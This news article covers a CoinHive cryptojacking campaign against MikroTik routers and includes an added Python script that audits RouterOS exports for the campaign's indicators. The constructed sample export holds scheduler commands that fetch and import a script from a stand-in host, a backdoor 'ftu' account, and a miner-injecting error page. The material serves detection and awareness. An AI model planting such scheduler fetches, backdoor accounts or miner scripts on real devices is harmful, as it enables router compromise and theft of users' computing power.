Cryptomining hack on ISP-grade routers found
An attack has been uncovered that compromises thousands of MikroTik routers, through a known vulnerability, to embed CoinHive cryptomining scripts in the web pages they serve. Researchers have reported more than 170,000 active MikroTik devices infected with the CoinHive site-key used in this attack, and in half a day an additional 15,000 routers were found to be affected. The attack is mainly targeting Brazil, but infections are growing internationally. MikroTik routers are used in large enterprises and by ISPs to serve web pages to thousands of users daily, meaning that each compromise translates into a big payday for the hackers.
The hackers are going straight for carrier-grade routers, bypassing small sites and individual computers. While cryptomining is the main goal of the attack, the script has persistence and the flexibility to change and add new features, increasing the threat. The attack shows the dangers of not keeping up to date with security patches: it takes advantage of a known vulnerability in the routers, which was patched by MikroTik on April 23rd. The hack targets Winbox and allows the hacker to gain unauthenticated remote administrative access to any vulnerable MikroTik router.
Instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the hacker uses the device's own functionality to inject the CoinHive script into every web page that a user visits. Researchers noted that many of the compromised pages are actually error pages of the web proxy, meaning that the hacker created a custom error page with the CoinHive script in it. When a user receives an error page of any kind while web browsing, they get this custom error page, which mines cryptocurrency through CoinHive for the hacker. What this means is that this affects not only users who are not directly connected to the infected router's network, but also users who visit websites behind these infected routers. The attack works in both directions.
Among the commands executed when a router is infected is the creation of scheduled tasks for updating the infection if and when needed. One scheduled task connects to another host and fetches a new "error.html" file, in case the site key was blocked and had to be replaced with another. The hacker also creates a scheduled task which downloads and executes a script written for MikroTik routers named "u113.rsc". A backdoor account named "ftu" is also created. When researchers looked into the script, it was only being used as a placeholder, but it gives the hacker a way to send additional commands to all compromised devices. These updates also add more cleanup commands to leave a smaller footprint and reduce the risk of being detected.
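As an added example (not part of the original article, and not MikroTik's own code), the following Python script audits a RouterOS `/export` dump for the indicators the two paragraphs above describe: a scheduler entry that fetches "error.html" or "u113.rsc", a user account named "ftu", and a web-proxy error page carrying a CoinHive miner. The sample export and the sample error page are constructed for this example; the host name payload.example and the site-key value are placeholders, not real indicators.

```python
"""Audit a RouterOS export and a web-proxy error page for the indicators
described in the article.  Added example, not MikroTik code."""
import re
from dataclasses import dataclass

# Indicators named in the article.
BACKDOOR_USERS = {"ftu"}
PAYLOAD_FILES = ("error.html", "u113.rsc")
MINER_MARKERS = ("coinhive",)


@dataclass
class Finding:
    section: str   # export section the command belongs to, e.g. "/user"
    command: str   # the offending command, continuation lines joined
    reason: str


def iter_export(text):
    """Yield (section, command) pairs from a RouterOS '/export' dump.

    An export groups commands under '/path' header lines and breaks long
    commands with a trailing backslash, so continuation lines are joined
    before the command is handed back.
    """
    section = ""
    pending = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if pending:
            line = pending + line.lstrip()
            pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        yield section, line


def audit_export(text):
    """Return a list of Findings for the campaign's indicators in an export."""
    findings = []
    for section, cmd in iter_export(text):
        low = cmd.lower()
        if section == "/user":
            # 'add group=full name=ftu' -> the backdoor account
            m = re.search(r'\bname="?([^"\s]+)"?', cmd)
            if m and m.group(1) in BACKDOOR_USERS:
                findings.append(Finding(section, cmd, "backdoor account from the campaign"))
        elif section == "/system scheduler":
            # on-event scripts that fetch the campaign's payload files
            hit = [f for f in PAYLOAD_FILES if f in low]
            if hit:
                findings.append(Finding(section, cmd, "scheduled fetch of " + ", ".join(hit)))
    return findings


def error_page_is_mining(html):
    """True if a web-proxy error page carries a CoinHive miner marker."""
    low = html.lower()
    return any(marker in low for marker in MINER_MARKERS)


# Constructed sample of a compromised device's export; not a real capture.
SAMPLE_EXPORT = """# constructed sample, not a real export
/ip proxy
set enabled=yes port=8080
/system scheduler
add interval=10m name=upd113 on-event="/tool fetch url=http://payload.example/u113.rsc \\
    mode=http dst-path=u113.rsc; /import u113.rsc" start-time=startup
add interval=1h name=errpage on-event="/tool fetch url=http://payload.example/error.html \\
    dst-path=webproxy/error.html" start-time=startup
add interval=1d name=nightly on-event="/system backup save" start-time=03:00:00
/user
add group=full name=ftu
add group=full name=admin
"""

# Constructed error page with a miner; the site key is a placeholder.
SAMPLE_ERROR_PAGE = (
    "<html><body>Proxy error"
    "<script src=\"http://payload.example/coinhive.min.js\"></script>"
    "<script>new CoinHive.Anonymous('SITEKEY_PLACEHOLDER').start();</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for f in audit_export(SAMPLE_EXPORT):
        print(f"{f.section}: {f.reason}\n    {f.command}")
    print("error page mining:", error_page_is_mining(SAMPLE_ERROR_PAGE))
```

Running the script on the constructed export reports the two scheduler entries and the "ftu" account while leaving the benign nightly backup task alone; the same functions can be pointed at a real `/export` output and at the file the proxy serves as its error page.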
This is another reminder that we must keep our equipment up to date with the latest security patches. Otherwise, hackers can compromise equipment to inject cryptojacking malware. Cryptojacking can be stopped in the browser and blocked at the local firewall. To help protect against some of these threats, use HTTPS requests instead of HTTP. Unfortunately, HTTPS depends on the website being viewed, and users can't force the option.